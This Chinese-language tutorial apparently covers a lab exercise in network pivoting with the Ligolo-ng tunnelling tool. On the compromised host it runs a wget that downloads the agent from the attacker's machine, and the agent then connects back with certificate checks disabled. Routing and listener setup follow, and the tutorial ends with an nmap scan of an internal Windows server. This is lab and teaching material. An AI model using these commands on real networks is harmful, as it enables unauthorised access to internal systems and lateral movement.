--- # System prepended metadata title: Ligolo Tunnel --- # Ligolo Tunnel [工具連結 - GitHub](https://github.com/nicocha30/ligolo-ng) ![Ligolo](https://hackmd.io/_uploads/S176gCjokg.png) 目前知曉172.16.1.100, 172.16.1.20, 172.16.2.5 這三台主機,綠色線表示可以存取對方的資料,紅色則表示不行,現在想要讓.100也能夠存取.2.5的資料,就需要透過建立隱藏通道的方式來進行封包的代理,本篇將介紹使用 Ligolo 來建立通道。 Ligolo可以代理的封包協定: 1. TCP 2. UDP 3. ICMP (關鍵!!!) 在 Attacker Machine 上建立 Ligolo Server ```zsh $ sudo ./proxy -selfcert WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! WARN[0000] Using self-signed certificates WARN[0000] TLS Certificate fingerprint for ligolo is: AB1D343AABAE24C7B25E7155B02B3D8348ED99A36A7D208DE99C514201411CD3 INFO[0000] Listening on 0.0.0.0:11601 __ _ __ / / (_)___ _____ / /___ ____ ____ _ / / / / __ `/ __ \/ / __ \______/ __ \/ __ `/ / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / /_____/_/\__, /\____/_/\____/ /_/ /_/\__, / /____/ /____/ Made in France ♥ by @Nicocha30! Version: 0.7.5 ligolo-ng » ``` 也建立一個 HTTP Server,方便上傳檔案 ```zsh python3 -m http.server ``` ## Single Pivoting 首先先在.100上下載Ligolo agent ``` wget http://10.10.14.2:8000/agent -O agent ``` 根據作業系統不同 agent的相容性有待確認 接著啟用 agent 並連回 server ```zsh $ ./agent -connect 10.10.14.2:11601 -ignore-cert WARN[0000] warning, certificate validation disabled INFO[0000] Connection established addr="10.10.14.2:11601" ``` ```zsh INFO[0000] Listening on 0.0.0.0:11601 __ _ __ / / (_)___ _____ / /___ ____ ____ _ / / / / __ `/ __ \/ / __ \______/ __ \/ __ `/ / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / /_____/_/\__, /\____/_/\____/ /_/ /_/\__, / /____/ /____/ Made in France ♥ by @Nicocha30! Version: 0.7.5 ligolo-ng » ligolo-ng » ligolo-ng » ligolo-ng » INFO[0630] Agent joined. id=a6a358a7-d4f7-4a02-9521-6112e369c32c remote="10.10.110.100:35890" ``` 回到server上可以看到Agent joined. 接著建立路由表 ```zsh └─$ sudo ip tuntap add user {使用者名稱} mode tun {通道名稱} $ sudo ip link set ligolo up ``` 使用者名稱為主機上的名稱,這邊我是kali 通道名稱: ligolo 並將 ligolo 啟用 添加路由: ```zsh sudo ip route add 172.16.1.0/24 dev ligolo ``` 添加成功! ```zsh= $ ip route list default via 192.168.216.2 dev eth0 proto dhcp src 192.168.216.134 metric 100 10.10.14.0/23 dev tun0 proto kernel scope link src 10.10.14.2 10.10.110.0/24 via 10.10.14.1 dev tun0 172.16.1.0/24 dev ligolo scope link linkdown 192.168.216.0/24 dev eth0 proto kernel scope link src 192.168.216.134 metric 100 ``` 回到 Server,啟用 Tunnel ```zsh [Agent : 10.10.110.10] » tunnel_start --tun ligolo [Agent : 10.10.110.10] » INFO[11152] Starting tunnel to 10.10.110.10 (a6a358a7-d4f7-4a02-9521-6112e369c32c) [Agent : 10.10.110.10] » tunnel_list ┌───────────────────────────────────────────┐ │ Active tunnels │ ├───┬───────────────────────────┬───────────┤ │ # │ AGENT │ INTERFACE │ ├───┼───────────────────────────┼───────────┤ │ 1 │ 10.10.110.10 │ ligolo │ └───┴───────────────────────────┴───────────┘ ``` 添加監聽器(Listener) ```zsh ligolo-ng » session ? Specify a session : 1 - 10.10.110.100:35890 - a6a358a7-d4f7-4a02-9521-6112e369c32c [Agent : 10.10.110.100] » listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp INFO[10636] Listener 0 created on remote agent! ``` 通道建立成功! ```zsh └─$ sudo nmap -F -sT -Pn -sV -T4 -O 172.16.1.20 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-10 01:57 EDT Nmap scan report for 172.16.1.20 Host is up (0.21s latency). Not shown: 77 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp filtered ftp 22/tcp filtered ssh 25/tcp filtered smtp 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 8.5 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-10 05:57:32Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 199/tcp filtered smux 389/tcp open ldap Microsoft Windows Active Directory LDAP 443/tcp filtered https 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 86.83 seconds ``` 參考資料: https://www.youtube.com/watch?v=de7IP_uZK6E https://www.ctfiot.com/162602.html https://docs.ligolo.ng/sample/basic/